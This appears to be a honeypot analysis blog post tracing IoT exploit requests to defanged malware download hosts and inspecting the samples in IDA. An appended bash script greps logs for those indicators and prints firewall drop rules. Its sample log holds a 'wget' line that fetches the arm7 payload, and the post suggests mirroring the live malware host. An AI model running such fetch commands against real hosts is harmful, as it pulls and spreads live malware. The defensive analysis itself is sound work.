In the meantime I decided to check again whether there is something 'new' in the logs from one of the honeypots I set up some time ago. Below you will find a few details from the journey...
When I was reading the logs from my WWW server I found an 'old and known' string, but with 'new' (attacker) IP(s):
One more screen with IP(s):
As you can see there are a few IPs, but they are all asking two hosts for the file. So we now have:
-- hxxp://g;mariokartayy;com
-- hxxp://104;244;72;82
The next step (after I downloaded the file from the logged request) was to read it ;)
So we found a sister, everybody! ;D
I decided to 'beautify' the code a little bit:
Now it's better ;]
Checking:
Some more results from strings tool:
At this stage I decided to google a little bit. I used the string from the malware request (the XML part with the <NewStatusUrl code), and that's how I found a weird pastebin link:
According to the date the script is still 'fresh':
Reading the source you will find the line mentioned before:
I don't know why it's still on pastebin... Anyway, looking through the other source codes available there you will find more weird tools, for example:
Well...
I would like to add one thing here: do not use those tools. It will probably be illegal.
Do only legal things.
At this stage I decided to get back to my shell and prepare a small bash script to automate the process of 'checking logs' and dropping 'bad guys' a bit ;)
For now we will have to ban our 'winners' on the firewall(s):
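The kind of script meant here, as an added example rather than the author's own: it reads a honeypot web-server access log, keeps the requests that carry the marker strings from this post (the `<NewStatusUrl>` tag and the two download hosts), counts the client IPs and prints firewall drop rules for review. The log format (combined format plus a trailing body excerpt) and all log lines are constructed for the demo; the `demo_log`, `offending_ips`, `ban_rules` and `annotate` names are mine.

```shell
#!/bin/sh
# Added example, not the author's script: pull the client IPs that sent the
# known-bad request string out of a honeypot web-server access log and turn
# them into a firewall drop list for review. Marker strings come from the post
# (the <NewStatusUrl> tag and the two download hosts); the log lines are
# constructed for this demo.

# Pattern for requests that fetch the payload or carry the exploit marker.
BAD_PATTERN='NewStatusUrl|mariokartayy|104\.244\.72\.82'

# Constructed sample log: combined format plus a trailing body excerpt, as a
# honeypot might record it. Three of the four lines are malicious, from two
# distinct client IPs.
demo_log() {
    cat <<'EOF'
198.51.100.7 - - [12/Feb/2020:03:14:07 +0000] "POST /upgrade HTTP/1.1" 404 162 "-" "-" body="<NewStatusUrl>redacted</NewStatusUrl>"
203.0.113.9 - - [12/Feb/2020:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0" body=""
198.51.100.7 - - [12/Feb/2020:03:15:41 +0000] "POST /upgrade HTTP/1.1" 404 162 "-" "-" body="<NewStatusUrl>redacted</NewStatusUrl>"
192.0.2.44 - - [12/Feb/2020:03:16:02 +0000] "GET /cgi-bin/x HTTP/1.1" 400 0 "-" "-" body="wget g.mariokartayy.com/arm7"
EOF
}

# Read log lines on stdin; print "count ip" for offending clients, busiest
# first. The client IP is the first field of a combined-format line.
offending_ips() {
    grep -E "$BAD_PATTERN" | awk '{ print $1 }' | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# Turn the offending list into iptables rules. They are printed, not executed,
# so the list can be reviewed before anything is banned.
ban_rules() {
    offending_ips | awk '{ printf "iptables -I INPUT -s %s -j DROP\n", $2 }'
}

# Optional PTR lookup in the style of the post's listing. Needs network access
# and the host(1) tool, so the lookup is skipped when host is missing.
annotate() {
    offending_ips | while read -r count ip; do
        printf '[+] %s (%s hits)\n' "$ip" "$count"
        if command -v host >/dev/null 2>&1; then
            host "$ip" 2>/dev/null | head -n 1
        fi
        echo '--'
    done
}

# Stand-alone run on the constructed sample. For a real log, feed it on stdin:
#   tail -n 100000 /var/log/apache2/access.log | ban_rules
demo_log | ban_rules
```

Piping the log in rather than hard-coding a path keeps the same functions usable on a live tail, a rotated archive via `zcat`, or the constructed sample above; printing the rules instead of applying them leaves a human between the honeypot and the firewall, which matters when a legitimate scanner or your own tests trip the pattern.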
[+] 156.196.247.242
242.247.196.156.in-addr.arpa domain name pointer host-156.196.242.247-static.tedata.net.
Country: MU
country: EG
--
[+] 156.199.87.116
116.87.199.156.in-addr.arpa domain name pointer host-156.199.116.87-static.tedata.net.
Country: MU
country: EG
--
[+] 156.201.76.26
26.76.201.156.in-addr.arpa domain name pointer host-156.201.26.76-static.tedata.net.
Country: MU
country: EG
--
[+] 156.220.219.222
222.219.220.156.in-addr.arpa domain name pointer host-156.220.222.219-static.tedata.net.
Country: MU
country: EG
--
[+] 197.33.174.107
107.174.33.197.in-addr.arpa domain name pointer host-197.33.174.107.tedata.net.
country: EG
--
[+] 41.47.40.149
149.40.47.41.in-addr.arpa domain name pointer host-41.47.40.149.tedata.net.
country: EG
--
[+] 92.4.84.196
196.84.4.92.in-addr.arpa domain name pointer host-92-4-84-196.as43234.net.
country: GB
Last view from IDA, checking strings again:
Following the selected line should get you here:
Cool, as we can see, the code is prepared to check 3 variants and run further downloads...
(At the time of writing this post other binaries, like yeet, were not available for download, but if you would like to get a fresh sample, use wget --mirror. Maybe you will find something interesting to check ;))
I tried to read a few of the found samples (in IDA), but the best one to check, in my opinion, is arm7.gemini:
As this sample (case) is already described online, I will leave it for you to play with and do some research yourself.
Good resources I found during the analysis:
- thanks to SeeBug
- thanks to Fortinet
- thanks to CheckPoint
See you next time ;)
Cheers
o/